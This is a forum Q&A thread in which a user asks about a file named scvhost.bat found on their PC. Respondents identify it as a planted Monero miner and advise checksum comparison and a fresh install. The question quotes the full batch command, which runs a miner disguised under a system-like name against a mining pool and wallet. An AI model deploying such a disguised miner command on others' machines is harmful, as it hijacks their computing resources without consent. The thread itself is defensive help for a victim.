17

I have just found this .bat file that was named scvhost.bat. The file had this content in it :

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Is this a virus (to steal info etc) or a planted miner ? I am worried as I also dabble in crypto currencies and stratum is a currency that is mentioned in above file.

grg
  • 2,242
  • 1
  • 19
  • 26
NewbieProgrammer
  • 273
  • 2
  • 7
  • 1
    This indeed seems to be a miner. Given that you use crypto currencies yourself, if you also mine, make sure this is not actually part of whatever you use to mine. You can do so by renaming the .bat extension to something else and see if you can still normally mine after a reboot. One thing I find odd about this file is that normally it would call itself given that scvhost is both the name of what it executes and the bat file. Normally that would result in a loop. – LPChip Jan 16 '18 at 09:34
  • @LPChip scvhost is a Windows system process, so the bat file is calling scvhost to start cryptonight.exe as a background service. – James Hyde Jan 16 '18 at 09:41
  • 2
    @VirtualAnomaly I think you are mistaken sVChost with sCVhost mentioned here. Yes I am very much aware that svchost is the mechanics for hosting services. – LPChip Jan 16 '18 at 09:55
  • Thank you guys for your response! I don't mine myself but do own a couple of coins. I found out that this was indeed a Monero coin miner installed in my system. No wonder my PC was getting so darn slow. I have the wallet address now and say the owner has mined 8+ Monero coins, that's around 3k :/ – NewbieProgrammer Jan 16 '18 at 10:00
  • 2
    @LPChip My apologies, you are correct, I was mistaken. – James Hyde Jan 16 '18 at 10:03
  • 2
    Somebody played too much Starcraft, I guess. – CodesInChaos Jan 16 '18 at 13:01
  • @CodesInChaos Is there a known issue with Starcraft, or why? (I obviously don't get it) – lucidbrot Jan 16 '18 at 17:28
  • 1
    @lucidbrot SCVs are the "builder" unit of one of the game's races (terrans), in which case it stands for "Space Construction Vehicle". – Aaron Jan 16 '18 at 18:26

1 Answers1

34

This does seem to be a miner of some sort, especially since the parameter contains the URL to a mining pool. However, you need to be sure what is in the binary. It would make sense to compare checksums of the binary you found of your system with the releases made by the development team of the miner. If they differ; consider you system unsecure.

Another issue is that you found out about this miner (probably because it was using a lot of CPU), but you have no idea what else happened on your system. If an intruder could launch the miner, they could've launched other things as well. It might be a good idea to recover from backup or do a fresh install anyway.

mtak
  • 16,513
  • 2
  • 52
  • 64